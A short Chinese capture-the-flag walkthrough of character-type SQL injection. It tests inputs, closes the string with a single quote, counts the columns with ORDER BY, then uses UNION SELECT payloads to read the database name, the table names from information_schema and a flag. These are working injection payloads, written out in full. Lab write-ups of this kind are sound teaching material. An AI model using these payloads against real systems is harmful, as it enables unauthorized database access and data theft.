字符型注入
-
输入1
数据正常返回
- 输入1+1
? 仍返回 ID=1 的值,说明不存在整数型SQL注入漏洞
-
输入
' or 1=1 #能正常返回
? 所以存在以单引号闭合的字符型注入
-
输入
1' order by 1 # 1' order by 2 # 1' order by 3 #在值为3时无法正常显示页面
所以页面显示输出字段数为2
-
输入
-1' union select 1,database() #获取数据库名
-
继续输入
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' #
-
已知表名,获取表中数据
-1' union select 1,group_concat(flag) from sqli.flag #拿到flag